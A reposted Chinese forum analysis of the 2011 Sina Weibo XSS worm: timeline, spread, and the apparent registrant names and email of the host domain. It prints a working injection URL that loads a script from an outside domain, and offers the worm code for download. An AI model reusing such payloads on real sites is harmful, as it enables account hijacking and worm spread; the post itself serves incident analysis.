免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 1166 | 回复: 0

新浪微博攻击事件分析 [复制链接]

论坛徽章:
0
发表于 2011-12-21 08:43 |显示全部楼层
一、事件的经过

新浪微博突然出现大范围“中毒”,大量用户自动发送“建党大业中穿帮的地方”、“个税起征点有望提到4000”、“郭美美事件的一些未注意到的细节”、“3D肉团团高清普通话版种子”等带链接的微博与私信,并自动关注一位名为hellosamy的用户。

事件的效果:
1.png


4.png

事件的经过线索如下:

20:14,开始有大量带V的认证用户中招转发蠕虫
20:30,2kt.cn中的病毒页面无法访问
20:32,新浪微博中hellosamy用户无法访问
21:02,新浪漏洞修补完毕

影响有多大:32961(这位hellosamy在帐号被封前的好友数量)。
5.jpg

二、采用了什么样的攻击方法

1、利用了新浪微博存在的XSS漏洞;

2、使用有道提供的短域名服务(这些网址目前已经“无害”);

例如,通过http://163.fm/PxZHoxn,将链接指向:
http://weibo.com/pub/star/g/xyyyd%22%3E%3Cscript%20src=//www.2kt.cn/images/t.js%3E%3C/script%3E?type=update

3、当新浪登陆用户不小心访问到相关网页时,由于处于登录状态,会运行这个js脚本做几件事情:

a.发微博(让更多的人看到这些消息,自然也就有更多人受害);
b.加关注,加uid为2201270010的用户关注——这应该就是大家提到的hellosamy了;
c.发私信,给好友发私信传播这些链接;

三、攻击者是谁?

攻击者不一定是2kt.cn的拥有者。目前暂时只能获得2kt.cn域名、网站拥有者信息如下。
不排除这个网站被攻击后,服务器被人放置恶意代码。

通过whois查询,2kt.cn的域名拥有者信息如下:

注册人: 张志
管理员邮件:lin5061@gmail.com

通过工信部的备案查询:http://www.miibeian.gov.cn/publish/query/indexFirst.action

网站负责人姓名:刘孝德
网站备案/许可证号:苏ICP备10108026号-1

四、为什么叫hellosamy?

2005年,首个利用跨站点脚本缺陷的蠕虫samy被“创造”出来了。Samy利用网站设计方面的缺陷,创建了一份“恶意”的用户档案,当该用户档案被浏 览时,就会自动地激活代码,将用户添加到Samy的“好友”列表中。另外,恶意代码还会被拷贝到用户的档案中,当其他人查看用户的档案时,蠕虫会继续传 播。Samy蠕虫能够造成与拒绝服务相当的效应,会造成好友列表中好友数量呈指数级增长,最终会消耗系统的大量资源。

因此,这次新浪微博的蠕虫,象是在对samy蠕虫致敬

五、参考信息

samy蠕虫的传播经历与技术细节:http://namb.la/popular,http://namb.la/popular/tech.html
新浪hellosamy蠕虫的传播与细节:http://bbs.unnoo.com/forum.php?mod=viewthread&tid=156&fromuid=2

六、本次蠕虫事件中的代码下载

t.js下载地址: 06.28_sina_XSS.txt.zip

原文:http://bbs.unnoo.com/forum.php?mod=viewthread&tid=156&fromuid=2
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP